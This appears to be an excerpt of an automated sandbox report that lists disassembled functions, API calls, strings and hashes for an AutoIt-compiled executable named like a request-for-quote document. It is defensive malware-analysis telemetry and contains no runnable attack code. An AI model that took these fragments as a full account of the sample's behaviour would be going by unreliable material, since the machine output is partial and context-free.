                                                        • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                        • String ID:
                                                        • API String ID: 2889604237-0
                                                        • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                        • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                                        • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                        • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                                        APIs
                                                        • GetDesktopWindow.USER32 ref: 00472BB2
                                                        • GetDC.USER32(00000000), ref: 00472BBB
                                                        • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                                        • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                        • String ID:
                                                        • API String ID: 2889604237-0
                                                        • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                        • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                                        • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                        • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                                        APIs
                                                        • __getptd_noexit.LIBCMT ref: 00415150
                                                          • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                                          • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                                          • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                                          • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                                          • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                                        • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                                        • __freeptd.LIBCMT ref: 0041516B
                                                        • ExitThread.KERNEL32 ref: 00415173
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                        • String ID:
                                                        • API String ID: 1454798553-0
                                                        • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                        • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                                        • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                        • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _strncmp
                                                        • String ID: Q\E
                                                        • API String ID: 909875538-2189900498
                                                        • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                        • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                                        • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                        • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                        APIs
                                                        • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                          • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                          • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                          • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                        • String ID: AutoIt3GUI$Container
                                                        • API String ID: 2652923123-3941886329
                                                        • Opcode ID: 8072d5a6eeba690fa35a4ade7926f5ea60e583888e5bb087a82b37f5ec0490ad
                                                        • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                        • Opcode Fuzzy Hash: 8072d5a6eeba690fa35a4ade7926f5ea60e583888e5bb087a82b37f5ec0490ad
                                                        • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _memmove_strncmp
                                                        • String ID: U$\
                                                        • API String ID: 2666721431-100911408
                                                        • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                        • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                                        • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                        • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                                        APIs
                                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                        • __wcsnicmp.LIBCMT ref: 00467288
                                                        • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                        • String ID: LPT
                                                        • API String ID: 3035604524-1350329615
                                                        • Opcode ID: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                        • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                                        • Opcode Fuzzy Hash: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                        • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                                        APIs
                                                        Strings
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID: \$h
                                                        • API String ID: 4104443479-677774858
                                                        • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                        • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                                        • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                        • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                                        APIs
                                                        Strings
                                                        Similarity
                                                        • API ID: _memcmp
                                                        • String ID: &
                                                        • API String ID: 2931989736-1010288
                                                        • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                        • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                                        • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                        • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                                        APIs
                                                        Strings
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID: \
                                                        • API String ID: 4104443479-2967466578
                                                        • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                        • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                                        • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                        • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                                        APIs
                                                        • _wcslen.LIBCMT ref: 00466825
                                                        • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                        Strings
                                                        Similarity
                                                        • API ID: CrackInternet_wcslen
                                                        • String ID: |
                                                        • API String ID: 596671847-2343686810
                                                        • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                        • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                                        • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                        • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                                        APIs
                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                        Strings
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: '
                                                        • API String ID: 3850602802-1997036262
                                                        • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                        • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                        • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                        • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                                        APIs
                                                        • _strlen.LIBCMT ref: 0040F858
                                                          • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                          • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                        • _sprintf.LIBCMT ref: 0040F9AE
                                                        Strings
                                                        Similarity
                                                        • API ID: _memmove$_sprintf_strlen
                                                        • String ID: %02X
                                                        • API String ID: 1921645428-436463671
                                                        • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                        • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                                        • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                        • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                        Strings
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: Combobox
                                                        • API String ID: 3850602802-2096851135
                                                        • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                        • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                        • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                        • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                        APIs
                                                        • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                        Strings
                                                        Similarity
                                                        • API ID: LengthMessageSendTextWindow
                                                        • String ID: edit
                                                        • API String ID: 2978978980-2167791130
                                                        • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                        • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                                        • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                        • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                                        APIs
                                                        • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                        • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                        Strings
                                                        Similarity
                                                        • API ID: GlobalMemorySleepStatus
                                                        • String ID: @
                                                        • API String ID: 2783356886-2766056989
                                                        • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                        • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                                        • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                        • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                                        APIs
                                                        Strings
                                                        Similarity
                                                        • API ID: htonsinet_addr
                                                        • String ID: 255.255.255.255
                                                        • API String ID: 3832099526-2422070025
                                                        • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                        • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                                        • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                        • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                                        APIs
                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                        Strings
                                                        Similarity
                                                        • API ID: InternetOpen
                                                        • String ID: <local>
                                                        • API String ID: 2038078732-4266983199
                                                        • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                        • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                                        • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                        • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                                        APIs
                                                        Strings
                                                        Similarity
                                                        • API ID: __fread_nolock_memmove
                                                        • String ID: EA06
                                                        • API String ID: 1988441806-3962188686
                                                        • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                        • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                                        • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                        • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID: u,D
                                                        • API String ID: 4104443479-3858472334
                                                        • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                        • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                                        • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                        • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                                        APIs
                                                        • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                        • wsprintfW.USER32 ref: 0045612A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: MessageSend_mallocwsprintf
                                                        • String ID: %d/%02d/%02d
                                                        • API String ID: 1262938277-328681919
                                                        • Opcode ID: 7568e53d503701dc6c53574dfbed37be0c9226c9331a2ec32bea4e30f7db6fe8
                                                        • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                                        • Opcode Fuzzy Hash: 7568e53d503701dc6c53574dfbed37be0c9226c9331a2ec32bea4e30f7db6fe8
                                                        • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                                        APIs
                                                        • InternetCloseHandle.WININET(?), ref: 00442663
                                                        • InternetCloseHandle.WININET ref: 00442668
                                                          • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: CloseHandleInternet$ObjectSingleWait
                                                        • String ID: aeB
                                                        • API String ID: 857135153-906807131
                                                        • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                        • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                                        • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                        • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                                        APIs
                                                        Strings
                                                        • C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe, xrefs: 0043324B
                                                        • ^B, xrefs: 00433248
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: _wcsncpy
                                                        • String ID: ^B$C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe
                                                        • API String ID: 1735881322-2818189993
                                                        • Opcode ID: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                                        • Instruction ID: 95fca152a805ab331260cabc3645652019b64b11bc5d0d7a1f408bc65d2df1f2
                                                        • Opcode Fuzzy Hash: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                                        • Instruction Fuzzy Hash: ADE0C23360051A7B9710DE4AD841DBBF37DEEC4A20B08802AF90883200E2B1BD1A43E4
                                                        APIs
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                        • PostMessageW.USER32(00000000), ref: 00441C05
                                                          • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: FindMessagePostSleepWindow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 529655941-2988720461
                                                        • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                        • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                                        • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                        • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                                                        APIs
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                          • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: FindMessagePostSleepWindow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 529655941-2988720461
                                                        • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                        • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                                        • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                        • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                                        APIs
                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                          • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: Message_doexit
                                                        • String ID: AutoIt$Error allocating memory.
                                                        • API String ID: 1993061046-4017498283
                                                        • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                        • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                                        • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                        • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D